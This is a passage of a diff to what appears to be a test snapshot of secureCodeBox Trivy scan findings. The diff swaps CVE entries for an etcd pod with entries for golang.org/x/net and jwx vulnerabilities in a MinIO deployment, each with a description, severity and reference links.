"https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", + "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", + "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", + "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", + "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", + "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "AES-CBC decryption is vulnerable to a timing attack which may permit an attacker to recover the plaintext of JWE data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - }, - { - "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - }, - { - "type": "URL", - "value": "https://go.dev/cl/340830", - }, - { - "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - }, - { - "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/advisories/GHSA-rm8v-mxj3-5rmq", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + }, + { + "type": "URL", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + }, + { + "type": "URL", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + }, + { + "type": "URL", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", + }, + { + "type": "URL", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + }, + { + "type": "URL", + "value": "https://github.com/golang/go/issues/54658", + }, + { + "type": "URL", + "value": "https://go.dev/cl/428735", + }, + { + "type": "URL", + "value": "https://go.dev/issue/54658", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcdctl' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", + "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41721", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "https://access.redhat.com/security/cve/CVE-2022-41721", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", + "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "https://go.dev/cl/447396", + "https://go.dev/issue/56352", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "https://pkg.go.dev/vuln/GO-2023-1495", + "https://www.cve.org/CVERecord?id=CVE-2022-41721", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "request smuggling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2022-41721", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://access.redhat.com/security/cve/CVE-2022-41721", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41721", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://go.dev/cl/447396", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://go.dev/issue/56352", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://pkg.go.dev/vuln/GO-2023-1495", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.7.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", + ], + }, + "category": "Vulnerability", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "avoid quadratic complexity in HPACK decoding", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.4.0", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", + ], + }, + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://go.dev/cl/455635", + }, + { + "type": "URL", + "value": "https://go.dev/cl/455717", + }, + { + "type": "URL", + "value": "https://go.dev/issue/56350", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + }, + { + "type": "URL", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + }, + { + "type": "URL", + "value": 